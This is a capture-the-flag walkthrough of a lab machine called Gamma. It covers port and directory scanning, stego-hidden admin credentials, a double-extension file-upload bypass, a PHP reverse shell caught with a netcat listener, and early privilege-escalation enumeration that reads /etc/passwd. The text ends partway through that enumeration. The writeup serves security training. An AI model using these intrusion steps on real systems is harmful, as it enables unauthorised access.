# Gamma CTF

## Table of Contents:

1. Scanning
   * TCP Scan
   * UDP Scan
2. Port 80
   * Directory Brute-Forcing (Gobuster)
   * Web server Vulnerability Scanning (Nikto)
   * Source Code Inspection
   * Steganography
   * Admin Login
   * Exploiting File Upload
   * Initial Foothold (www-data)
3. Privilege Escalation
   * Linpeas
   * Manual Privilege Escalation Techniques
   * Kernel Exploit
   * Root Flag
4. Other Attack Vectors
   * Trying other Privilege Escalation Exploits
   * Nessus Scan
   * Exploring Other Ports
5. Remediations and Recommendations for Machine Owner
6. References

## 1- Scanning

### TCP

```
nmap -sS -sV -p- 192.168.229.158
```

#### Results

```
┌──(kali㉿kali)-[~]
└─$ nmap -sS -sV -p- 192.168.229.158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 13:41 EET
Nmap scan report for 192.168.229.158
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
5355/tcp open  llmnr?
MAC Address: 00:0C:29:78:F8:7B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.41 seconds
```

#### Ports Open:

```
22/tcp   open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
5355/tcp open  llmnr?
```

#### Aggressive Scan on Open Ports

```
sudo nmap -sT -A -p22,53,80,5355 192.168.229.158
```

Results:

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 98:b7:f5:6b:0d:58:1d:7b:58:7d:1a:99:fb:b1:8f:04 (RSA)
|   256 66:b4:4b:40:e6:c9:76:93:31:aa:fc:ff:9a:40:a9:f9 (ECDSA)
|_  256 55:c6:b2:01:0f:16:1c:68:96:e2:bb:b1:fe:ff:59:c2 (ED25519)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: School of Engineering
5355/tcp open  llmnr?
MAC Address: 00:0C:29:78:F8:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.10 (99%), Linux 3.2 - 4.9 (97%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.10 - 4.11 (94%), Linux 4.4 (94%), Linux 3.13 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (94%), Linux 3.2 - 3.16 (94%), Linux 3.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### UDP

```
nmap -sU 192.168.229.158
```

Results:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 04:03 EET
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 2.60% done; ETC: 04:10 (0:06:52 remaining)
Stats: 0:03:15 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 20.68% done; ETC: 04:19 (0:12:28 remaining)
Stats: 0:16:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.20% done; ETC: 04:20 (0:00:08 remaining)
Nmap scan report for 192.168.229.158
Host is up (0.00072s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT     STATE         SERVICE
53/udp   open          domain
68/udp   open|filtered dhcpc
5355/udp open|filtered llmnr
MAC Address: 00:0C:29:78:F8:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1019.81 seconds
```

### Vulnerability Scanning

```
nmap --script vuln -p 22,53,80,5355 192.168.229.158
```

Results:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 03:48 EET
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.229.158
Host is up (0.00073s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
5355/tcp open  llmnr
MAC Address: 00:0C:29:78:F8:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 64.43 seconds
```

## 2- Port 80

### Gobuster

```
gobuster dir -u http://192.168.229.158 -w /usr/share/wordlists/dirb/common.txt
```

#### Results:

```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.229.158
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/administrator        (Status: 301) [Size: 326] [--> http://192.168.229.158/administrator/]
/css                  (Status: 301) [Size: 316] [--> http://192.168.229.158/css/]
/fonts                (Status: 301) [Size: 318] [--> http://192.168.229.158/fonts/]
/images               (Status: 301) [Size: 319] [--> http://192.168.229.158/images/]
/index.html           (Status: 200) [Size: 32410]
/js                   (Status: 301) [Size: 315] [--> http://192.168.229.158/js/]
/server-status        (Status: 403) [Size: 280]
/vendor               (Status: 301) [Size: 319] [--> http://192.168.229.158/vendor/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
```

#### Important Directories:

```
/administrator
/images
/vendor
```

### Nikto

```
nikto -h http://192.168.229.158
```

Results:

```
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.229.158
+ Target Hostname:    192.168.229.158
+ Target Port:        80
+ Start Time:         2024-11-26 13:46:30 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 7e9a, size: 627c629320964, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /administrator/: This might be interesting.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /administrator/index.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2024-11-26 13:46:47 (GMT2) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

### Firefox

Now, let's open the website in Firefox:

Let's visit "<http://192.168.229.158>"

#### Source code:

Source code for "<http://192.168.229.158>": after inspecting the source code closely, nothing seems suspicious.

#### /administrator

Now, let's check the source code of this directory, which appeared in both the nikto and gobuster results:

**Login Page:**

<figure><img src="/files/jm7i3zsQNwAB2yQXhRMS" alt=""><figcaption></figcaption></figure>

**Source Code:**

<figure><img src="/files/mqcN8Iy5Okmk1U47OKLK" alt=""><figcaption></figcaption></figure>

There is an important comment in the source code, which is: " Find the image hidden around, Do you know steganography in images bud? "

#### /images

Let's now move on to the /images directory, since the hint above suggests steganography is involved.

<figure><img src="/files/CRX4SFEKuBJmMbEtqYcZ" alt=""><figcaption></figcaption></figure>

Flag.txt found!

Let's read its content.

**Flag.txt:** "Almost there!

Odin is the god of wisdom. He bestoys "hidden" knowledge that only the initiate can know. Did you notice something hidden in its image?

Dr. Hussein Bakri "

Hint: there is something hidden in Odin's image.

In this directory we can also see a PNG file named OdinHiddenKnowledge.png.

Let's check it out:

<figure><img src="/files/gpAUYVSSjA1viS1DKF1h" alt=""><figcaption></figcaption></figure>

### Steganography

Let's download this image to our attacker machine to analyze it for steganography and find what is hidden inside it.

<figure><img src="/files/NFeihUewJgSYzh5r5nZu" alt=""><figcaption></figcaption></figure>

#### exiftool

```
exiftool OdinHiddenKnowledge.png
```

```
ExifTool Version Number         : 13.00
File Name                       : OdinHiddenKnowledge.png
Directory                       : .
File Size                       : 689 kB
File Modification Date/Time     : 2024:11:26 14:03:40+02:00
File Access Date/Time           : 2024:11:26 14:03:40+02:00
File Inode Change Date/Time     : 2024:11:26 14:03:40+02:00
File Permissions                : -rw-rw-r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 759
Image Height                    : 890
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Image Size                      : 759x890
Megapixels                      : 0.676
```

#### strings

```
strings OdinHiddenKnowledge.png
```

Nothing seems suspicious.

#### steghide

```
steghide extract -sf OdinHiddenKnowledge.png
```

```
Enter passphrase: 
steghide: the file format of the file "OdinHiddenKnowledge.png" is not supported.
```

#### binwalk

```
binwalk OdinHiddenKnowledge.png
```

```
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 759 x 890, 8-bit/color RGBA, non-interlaced
41            0x29            Zlib compressed data, compressed
18017         0x4661          JBOOT STAG header, image id: 8, timestamp 0xD51B2DC9, image size: 4129282426 bytes, image JBOOT checksum: 0x7BB1, header JBOOT checksum: 0xADFD
```

Important things found here:

* A PNG starting at 0x0.
* zlib compressed data at 0x29.
* A suspicious header at 0x4661.

Let's now extract them:

```
binwalk -e OdinHiddenKnowledge.png
```

Result:

```
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
41            0x29            Zlib compressed data, compressed

WARNING: One or more files failed to extract: either no utility was found or it's unimplemented
```

Let's check the extracted directory `_OdinHiddenKnowledge.png.extracted`:

```
ls -la _OdinHiddenKnowledge.png.extracted
```

```
total 684
drwxrwxr-x 2 kali kali   4096 Nov 26 15:03 .
drwxrwxr-x 3 kali kali   4096 Nov 26 15:03 ..
-rw-rw-r-- 1 kali kali      0 Nov 26 15:03 29
-rw-rw-r-- 1 kali kali 689084 Nov 26 15:03 29.zlib
```

Results:

* There is an empty file `29`.
* There is a zlib-compressed file `29.zlib`.

Let's identify `29.zlib`:

```
file 29.zlib
```

Result:

```
29.zlib: zlib compressed data
```

Let's decompress this zlib stream:

Nothing important inside.

#### zsteg

```
zsteg -a OdinHiddenKnowledge.png
```

Results:

```
b1,rgb,lsb,xy       .. text: "godofhacking is HusseinBakri. This incantation allows you access for sure."
b2,r,msb,xy         .. text: "}UWUUUUUUUUTUUUQ"
b2,g,msb,xy         .. text: "WUUUUUUUUTUUUQ"
b2,b,msb,xy         .. text: "]_WUUUUUUUUTUUUQ"
b2,rgb,msb,xy       .. text: "UUUUUUUUUUUUUUUUUUUUUUUUUU@UUUUUUUUUUU"
b2,bgr,msb,xy       .. text: "UUUUUUUUUUUUUUUUUUUUUUUUUU@UUUUUUUUUUU"
b2,abgr,msb,xy      .. text: ["W" repeated 35 times]
b3,b,msb,xy         .. file: MPEG ADTS, layer I, v2,  96 kbps, Monaural
b3,abgr,msb,xy      .. file: MPEG ADTS, layer I, v2,  96 kbps, Monaural
b3p,r,msb,xy        .. text: "[{[[[[[[[[[[[K[[[[[YK"
b3p,g,msb,xy        .. text: "[[[[[[[[[[[K[[[[[YK"
b3p,b,msb,xy        .. text: "{[[[[[[[[[[[K[[[[[YK"
b3p,rgb,msb,xy      .. text: "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[\t[[[[[[[[[[[[[[[[\t[[[\tR\t"
b3p,bgr,msb,xy      .. text: "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[\t[[[[[[[[[[[[[[[[\t[[[\tR\t"
b3p,abgr,msb,xy     .. text: ["_" repeated 35 times]
b4,r,msb,xy         .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw"
b4,g,msb,xy         .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw"
b4,b,lsb,xy         .. file: AIX core file 64-bit
b4,b,msb,xy         .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw"
b4,bgr,msb,xy       .. file: MPEG ADTS, layer I, v2, 112 kbps, 24 kHz, Monaural
b5,g,msb,xy         .. file: MPEG ADTS, layer II, v1, Monaural
b5,b,lsb,xy         .. file: MPEG ADTS, layer II, v1, 384 kbps, Monaural
b5,bgr,lsb,xy       .. file: MPEG ADTS, layer II, v1, JntStereo
b5p,r,msb,xy        .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'"
b5p,g,msb,xy        .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'"
b5p,b,lsb,xy        .. file: MPEG ADTS, layer I, v2, Monaural
b5p,b,msb,xy        .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'"
b5p,rgb,msb,xy      .. text: "ooooooooooooooooooooooooooooooooooo'oooooooooooooooo'ooo'K'"
b5p,bgr,msb,xy      .. text: "ooooooooooooooooooooooooooooooooooo'oooooooooooooooo'ooo'K'"
b5p,abgr,msb,xy     .. file: ddis/ddif
b6,g,msb,xy         .. file: MPEG ADTS, layer I, v2, Monaural
b6,abgr,msb,xy      .. file: ddis/ddif
b6p,r,msb,xy        .. text: "_________________O_______"
b6p,g,msb,xy        .. text: "_________________O_______"
b6p,b,lsb,xy        .. file: , Monaural
b6p,b,msb,xy        .. text: "_________________O_______"
b6p,rgb,msb,xy      .. text: ["_" repeated 35 times]
b6p,abgr,msb,xy     .. file: ddis/ddif
b7,r,lsb,xy         .. file: AIX core file fulldump 32-bit
b7,g,lsb,xy         .. file: , Monaural
b7,rgb,lsb,xy       .. file: AIX core file fulldump 32-bit
b7p,r,msb,xy        .. text: ["?" repeated 17 times]
b7p,g,msb,xy        .. text: ["?" repeated 17 times]
b7p,b,lsb,xy        .. file: MPEG ADTS, layer II, v1, Monaural
b7p,b,msb,xy        .. text: ["?" repeated 17 times]
b7p,rgb,msb,xy      .. text: ["?" repeated 35 times]
b7p,bgr,msb,xy      .. text: ["?" repeated 35 times]
b7p,abgr,msb,xy     .. file: ddis/ddif
b8,r,msb,xy         .. file: RDI Acoustic Doppler Current Profiler (ADCP)
b8,bgr,msb,xy       .. file: ddis/ddif
b1,bgr,lsb,xy,prime .. /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s': stack level too deep (SystemStackError)
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
         ... 10066 levels...
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg.rb:26:in `run'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/bin/zsteg:8:in `<top (required)>'
        from /usr/local/bin/zsteg:25:in `load'
        from /usr/local/bin/zsteg:25:in `<main>'
        
```

There is an EXTREMELY important hint:

Hint: "godofhacking is HusseinBakri. This incantation allows you access for sure"
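To make zsteg's `b1,rgb,lsb,xy` label concrete, here is an added Python model (not zsteg's code and not part of the original writeup) of that extraction: one bit per channel in r,g,b order, pixels walked row by row. The cover image is constructed noise, and the bit order inside each byte (most significant bit first) is an assumption; zsteg tries both orders, as the `lsb`/`msb` entries above show.

```python
"""What zsteg's "b1,rgb,lsb,xy" label describes: one bit from each colour
channel, channels in r,g,b order, pixels walked row by row (x, then y).
Added example, not zsteg's code. The cover is constructed noise and the
bit order inside each byte (MSB first) is an assumption; zsteg tries both."""

from typing import Iterator

# Pixels are 8-bit RGBA tuples, as in the 759x890 PNG; an image is a list of rows.
CHANNEL_INDEX = {"r": 0, "g": 1, "b": 2, "a": 3}

# The string zsteg recovered from OdinHiddenKnowledge.png (quoted from the writeup).
HINT = b"godofhacking is HusseinBakri. This incantation allows you access for sure."


def make_cover(width: int, height: int, seed: int = 1) -> list:
    """Deterministic pseudo-random RGBA noise standing in for a real cover image."""
    state, rows = seed, []
    for _ in range(height):
        row = []
        for _ in range(width):
            vals = []
            for _ in range(4):
                state = (state * 1103515245 + 12345) & 0x7FFFFFFF  # LCG step
                vals.append((state >> 16) & 0xFF)
            row.append(tuple(vals))
        rows.append(row)
    return rows


def message_bits(data: bytes) -> Iterator[int]:
    """Yield the bits of each byte, most significant bit first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed_lsb(img: list, data: bytes, channels: str = "rgb") -> list:
    """Overwrite bit 0 of the chosen channels with the message, pixel by pixel in xy order."""
    capacity = len(img) * len(img[0]) * len(channels)
    if len(data) * 8 > capacity:
        raise ValueError(f"need {len(data) * 8} bits, cover holds {capacity}")
    bits, out = message_bits(data), []
    for row in img:
        new_row = []
        for px in row:
            vals = list(px)
            for ch in channels:
                bit = next(bits, None)  # None once the message is exhausted
                if bit is not None:
                    i = CHANNEL_INDEX[ch]
                    vals[i] = (vals[i] & 0xFE) | bit
            new_row.append(tuple(vals))
        out.append(new_row)
    return out


def extract_lsb(img: list, channels: str = "rgb", msb_first: bool = True) -> bytes:
    """Read bit 0 of each chosen channel in xy order and pack 8 bits per byte,
    the "b1,<channels>,<bit order>,xy" extraction that zsteg reports."""
    out, byte, nbits = bytearray(), 0, 0
    for row in img:
        for px in row:
            for ch in channels:
                bit = px[CHANNEL_INDEX[ch]] & 1
                byte = ((byte << 1) | bit) if msb_first else (byte | (bit << nbits))
                nbits += 1
                if nbits == 8:
                    out.append(byte)
                    byte, nbits = 0, 0
    return bytes(out)


def printable_prefix(data: bytes) -> str:
    """Leading run of printable ASCII, the way zsteg reports a 'text:' hit."""
    chars = []
    for b in data:
        if not 32 <= b < 127:
            break
        chars.append(chr(b))
    return "".join(chars)


def demo_stego() -> list:
    """A 64x8 constructed cover carrying HINT in its r,g,b LSBs."""
    return embed_lsb(make_cover(64, 8), HINT)


if __name__ == "__main__":
    stego = demo_stego()
    # Only the matching channel set and bit order yields readable text,
    # which is why zsteg enumerates all of these combinations.
    for channels, msb in (("rgb", True), ("rgb", False), ("bgr", True), ("r", True)):
        text = printable_prefix(extract_lsb(stego, channels, msb))
        print(channels, "msb_first" if msb else "lsb_first", repr(text[:40]))
```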

Let's try those as credentials on /administrator.

username: `godofhacking` password: `HusseinBakri`

And........ we are in!

<figure><img src="/files/CAujsFPrWVDfmH8hIteS" alt=""><figcaption></figcaption></figure>

### File Upload

Let's now try to upload a PHP reverse shell.

Note: we still need to find out where uploaded files are stored.

From Pentest Monkey, I downloaded a PHP reverse shell and modified the port and the IP.

Now, let's try to upload the reverse shell.

<figure><img src="/files/uErUVmCnvLPWrfVbOHka" alt=""><figcaption></figcaption></figure>

When I pressed on submit, it redirected me to this page:

<figure><img src="/files/LAmZdIm7KeVzOMqSXpPu" alt=""><figcaption></figcaption></figure>

So, I wasn't able to upload.

Let's see what the cause of this problem is.

Let's try renaming my file from `pentest_monkey_php_reverse_shell.php` to `pentest_monkey_php_reverse_shell.php.jpg` and re-uploading.

<figure><img src="/files/O9nowDFKHQLudkeMMAKZ" alt=""><figcaption></figcaption></figure>

Still not working.

Let's try renaming it to .phtml, .php3 and .png.

* phtml didn't work.
* php3 didn't work either.
* png didn't work either.

Before I move on to Burp Suite, one last time, I am going to upload a real PNG file and a real JPG file, to confirm that uploading isn't working at all.

... and yes, both didn't work either.

Let's try our luck and SSH into the machine using those credentials:

username: `godofhacking` password: `HusseinBakri`

```
┌──(kali㉿kali)-[~/gamma_project]
└─$ ssh godofhacking@192.168.229.158
godofhacking@192.168.229.158's password: 
Permission denied, please try again.
```

Didn't work.

Before we move on, this looks suspicious: `ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1`

It is found here in the source code:

<figure><img src="/files/Dk6AiqeU96MhWT0wQORx" alt=""><figcaption></figcaption></figure>

And, when I upload a file, it takes me to "<http://192.168.229.158/administrator/ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1.php>"

This looks like a hash (64 hex characters).

Let's look it up on "<https://hashes.com/en/decrypt/hash>" to see whether it matches a known string.

Output: `ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1:upload`

Nice. So this is the hash of `upload`.

I will try to append `upload` to the URL and try to re-upload.

The resulting URL: `http://192.168.229.158/administrator/husseinbakri.php/upload`

Let's try to re-upload the reverse shell file:

<figure><img src="/files/JwVssZ5BvwoKVN2vnX2i" alt=""><figcaption></figcaption></figure>

The site says: `The image format must be jpg,jpeg,gif,png`

Let's change the extension to .jpg.php:

```
mv reverse_monkey_shell.php reverse_monkey_shell.jpg.php
```

<figure><img src="/files/iZ8XZEpWLNl4lEJCsGob" alt=""><figcaption></figcaption></figure>

Upload success (top left).
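As an added example (not the machine's PHP, which the writeup doesn't show), here is a Python model of an extension check that reproduces this behaviour, rejecting `.php` but accepting `.jpg.php`, next to the hardened check and server-side naming a defender would use; `weak_is_allowed` is a hypothesis about the site's logic, not its actual code.

```python
"""Model of the upload filter that rejected 'shell.php' yet accepted
'shell.jpg.php', beside a hardened check. Added example: the machine's
PHP upload handler is not shown in the writeup, so weak_is_allowed() is a
hypothesis that reproduces the observed behaviour, not its actual code."""

import os
import secrets
from typing import Optional

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}

# Leading bytes of each allowed format (from the public file-format specs).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def weak_is_allowed(filename: str) -> bool:
    """Hypothetical weak check: pass if ANY dotted part is an image extension.
    'shell.php' -> rejected, 'shell.jpg.php' -> accepted; but the web server
    maps the saved file to PHP by its final '.php', so it still executes."""
    parts = filename.lower().split(".")[1:]
    return any(part in ALLOWED_EXTENSIONS for part in parts)


def strict_is_allowed(filename: str, content: bytes) -> bool:
    """Hardened check: only the LAST extension counts, and the body must start
    with the magic bytes of the format that extension claims."""
    root, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lstrip(".").lower()
    if not root or ext not in ALLOWED_EXTENSIONS:
        return False
    return any(content.startswith(sig) for sig in MAGIC[ext])


def safe_storage_name(filename: str, content: bytes) -> Optional[str]:
    """Server-chosen random name carrying only the validated extension, or
    None when rejected. Discarding the client's filename removes the
    double-extension trick and stops guessing of the stored path."""
    if not strict_is_allowed(filename, content):
        return None
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed test files: a minimal PNG header and a harmless PHP stub.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    php = b"<?php /* constructed placeholder */ ?>"
    for name, body in (("odin.png", png), ("shell.php", php), ("shell.jpg.php", php)):
        print(f"{name:16} weak={weak_is_allowed(name)!s:5} "
              f"strict={strict_is_allowed(name, body)}")
```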

What we have to do now is trigger the reverse shell.

Before that, I noticed that any path after `/administrator/husseinbakri.php/` works: if I browse to `http://192.168.229.158/administrator/husseinbakri.php/test`, for example, I can still upload a file successfully.

So, now, let's trigger this reverse shell:

I tried browsing to `http://192.168.229.158/administrator/husseinbakri.php/reverse_shell.jpg.php`, but it didn't work.

I then searched all the directories that were found previously, such as images, vendor..., but the reverse shell wasn't there either.

However, I noticed something important. When I was uploading via `http://192.168.229.158/administrator/husseinbakri.php/`, it was taking me to this URL: "<http://192.168.229.158/administrator/ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1.php>"

So, what I did was edit the URL to "<http://192.168.229.158/administrator/reverse_shell.jpg.php>".

And boom! It worked!

<figure><img src="/files/8ERmN0u7blYWSVYYey8V" alt=""><figcaption></figcaption></figure>

In the meantime, a netcat listener was waiting with:

```
nc -lvnp 1234
```

<figure><img src="/files/YMkeAnbLzrk0UkEfT6Om" alt=""><figcaption></figcaption></figure>

Now, let's upgrade the shell to a proper TTY using:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

## 3- Privilege Escalation

### Enumerating www-data

Let's do some enumeration, now that we have our initial foothold on the machine:

```
www-data@gamma:/$ whoami
whoami
www-data
www-data@gamma:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@gamma:/$ 
```

Kernel:

```
www-data@gamma:/$ uname -a
uname -a
Linux gamma 4.10.0-19-generic #21-Ubuntu SMP Thu Apr 6 17:04:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```

Files:

```
www-data@gamma:/$ ls -la
ls -la
total 483912
drwxr-xr-x  23 root root      4096 Nov 25 23:03 .
drwxr-xr-x  23 root root      4096 Nov 25 23:03 ..
-rw-------   1 root root        31 Nov 25 23:03 .bash_history
drwxr-xr-x   2 root root      4096 Sep 16  2020 bin
drwxr-xr-x   3 root root      4096 Sep 16  2020 boot
drwxr-xr-x  18 root root      3760 Dec  2 20:21 dev
drwxr-xr-x 100 root root      4096 Nov 25 21:18 etc
drwxr-xr-x   3 root root      4096 Sep 16  2020 home
lrwxrwxrwx   1 root root        33 Sep 16  2020 initrd.img -> boot/initrd.img-4.10.0-19-generic
drwxr-xr-x  23 root root      4096 Sep 16  2020 lib
drwxr-xr-x   2 root root      4096 Sep 16  2020 lib64
drwx------   2 root root     16384 Sep 16  2020 lost+found
drwxr-xr-x   3 root root      4096 Sep 16  2020 media
drwxr-xr-x   2 root root      4096 Apr 12  2017 mnt
drwxr-xr-x   2 root root      4096 Apr 12  2017 opt
dr-xr-xr-x 210 root root         0 Dec  2 20:21 proc
drwx------   4 root root      4096 Nov 25 23:09 root
drwxr-xr-x  25 root root       900 Dec  2 20:21 run
drwxr-xr-x   2 root root     12288 Sep 16  2020 sbin
drwxr-xr-x   2 root root      4096 Apr  6  2017 snap
drwxr-xr-x   2 root root      4096 Apr 12  2017 srv
-rw-------   1 root root 495416320 Sep 16  2020 swapfile
dr-xr-xr-x  13 root root         0 Dec  2 20:21 sys
drwxrwxrwt   3 root root      4096 Dec  2 20:24 tmp
drwxr-xr-x  10 root root      4096 Sep 16  2020 usr
drwxr-xr-x  14 root root      4096 Sep 16  2020 var
lrwxrwxrwx   1 root root        30 Sep 16  2020 vmlinuz -> boot/vmlinuz-4.10.0-19-generic

```

Let's check the usernames on the system:

```
www-data@gamma:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
